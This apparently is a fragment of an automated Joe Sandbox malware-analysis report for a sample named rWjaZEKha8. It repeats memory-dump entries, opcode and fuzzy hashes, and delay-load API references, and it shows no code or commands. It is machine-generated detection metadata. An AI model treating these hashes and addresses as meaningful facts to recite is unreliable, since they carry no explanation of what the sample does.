                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3a6f5b4a255a76d7791530e9d684bb1310ce82a01fbde8f55ae5f1c219c9a517
                  • Instruction ID: 50f3c7c96eaa7b5bfcc8e359008e363b94fbc47d9fcf3f9b9abef3130b0a009f
                  • Opcode Fuzzy Hash: 3a6f5b4a255a76d7791530e9d684bb1310ce82a01fbde8f55ae5f1c219c9a517
                  • Instruction Fuzzy Hash: E6B0129936C2826C310C71043E07D37036CC2D5B10331801BF20AD01C2DB954D065A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 37ef84409b763e690988fd60a435d0e481e16410053d61cacf6576f0cedf064f
                  • Instruction ID: 030400ce9e1943d0a0cc0709f869c312153b0da6be34caa56e917a6ae75dff80
                  • Opcode Fuzzy Hash: 37ef84409b763e690988fd60a435d0e481e16410053d61cacf6576f0cedf064f
                  • Instruction Fuzzy Hash: C6B0129936C242AC320C71043D07D37037CC2D1B10331801BF50AD11C2DB944D095A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: dbf97af7052b45ede29045e6c80af427f721573429718d985bf9445da16b193f
                  • Instruction ID: 0e4ff0b2ee8605bd8dc2655317831319c899f3550d2d9318a211820ea14351ac
                  • Opcode Fuzzy Hash: dbf97af7052b45ede29045e6c80af427f721573429718d985bf9445da16b193f
                  • Instruction Fuzzy Hash: 44B0929926C301AC210C31007A12836032CC2D0B11321861AF209A0081A7805D456931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 534f582cbde6eece33af95db6c9dd562f1a0c8c8b06275dacf9b1f6173124665
                  • Instruction ID: d51ddbdcf1d0a149a85751c113b65d83c3002b1f9d79cc14f0f8876e93ca2789
                  • Opcode Fuzzy Hash: 534f582cbde6eece33af95db6c9dd562f1a0c8c8b06275dacf9b1f6173124665
                  • Instruction Fuzzy Hash: ABB0129927C302AC310C71047D12D36037CC2D0B10330851FF20DE11C1E7805D055A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4f9f238f783a2492046bca4ee2c466dc97fa9344f561218656dab3f4faac70d8
                  • Instruction ID: df8abe6d2b0180988d53e86bf6d1aafcc412aa3bbf272b600cedaaf51887ff13
                  • Opcode Fuzzy Hash: 4f9f238f783a2492046bca4ee2c466dc97fa9344f561218656dab3f4faac70d8
                  • Instruction Fuzzy Hash: A0B0129926C301BC310C71047D12D36037CC2D5B10330C51FF60DE11C1E7805D055A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 45d7146f1daaccabf52715a239108bede93fff4a199fbaee2a35c42794bf0eda
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 45d7146f1daaccabf52715a239108bede93fff4a199fbaee2a35c42794bf0eda
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1a8f26d1c3897cbf9db2521555d10cb4fe161df9f8b56fecf6661a179de1c99a
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 1a8f26d1c3897cbf9db2521555d10cb4fe161df9f8b56fecf6661a179de1c99a
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 16d3449552b6e888ed2ea3df9ca1ae62c1fa9774f84e32ecddcc16b2d588aa67
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 16d3449552b6e888ed2ea3df9ca1ae62c1fa9774f84e32ecddcc16b2d588aa67
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6ba254cbc8d9ff901e2dc06b14aecade74820925357748f444f4146b2a4f160d
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 6ba254cbc8d9ff901e2dc06b14aecade74820925357748f444f4146b2a4f160d
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0ae84ea56880be6541afa7a2674311b9f1751139b6eec292b330cfc0b28c753d
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 0ae84ea56880be6541afa7a2674311b9f1751139b6eec292b330cfc0b28c753d
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: af81b81e7e4db1ba4568a288195cde7cfce6b1fab79ccf9d64bfa7d5d0b7f22a
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: af81b81e7e4db1ba4568a288195cde7cfce6b1fab79ccf9d64bfa7d5d0b7f22a
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 72b31a06ec2b4260a6c0244b6be8f492cb1e732aa4fd2da91bbb0e753e0f484b
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 72b31a06ec2b4260a6c0244b6be8f492cb1e732aa4fd2da91bbb0e753e0f484b
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 573716a586ba244d43513146a99766071c496c3b9d6de8d9586c00fd8ac207c5
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 573716a586ba244d43513146a99766071c496c3b9d6de8d9586c00fd8ac207c5
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5ca0a27f36581656f80234cc599508fd977e61da37dd63184d600292a18d38d3
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 5ca0a27f36581656f80234cc599508fd977e61da37dd63184d600292a18d38d3
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1a589840656cefafa5993e6e1fcd3d0fc59b5fc270246d100a712d23945f6622
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 1a589840656cefafa5993e6e1fcd3d0fc59b5fc270246d100a712d23945f6622
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 57f7916ae9bbbdf88ff5a926959256719f014d591467ccfae2012139c8f1408c
                  • Instruction ID: 7716ca6833438e04da8a2bc90229b8816536fbdb544d9c8a7858a92b82ef68b4
                  • Opcode Fuzzy Hash: 57f7916ae9bbbdf88ff5a926959256719f014d591467ccfae2012139c8f1408c
                  • Instruction Fuzzy Hash: 6AA0129516C2027C300C31507C42C36031CC5C3B103304409F006900C1974019051D30
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 28ae7ef3181ba9b46b24d0115212f8bd1b42a9a5e9c71dbd96f4795faee4b95d
                  • Instruction ID: d7809cf75d41f7636ba50c8e151aaa7872d83fc1ae5e4d426c7f736eaf26e57f
                  • Opcode Fuzzy Hash: 28ae7ef3181ba9b46b24d0115212f8bd1b42a9a5e9c71dbd96f4795faee4b95d
                  • Instruction Fuzzy Hash: 7EA012D526C2013C300C7142BC02C3A031CC1D0B11330410AB006900C5574009051D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
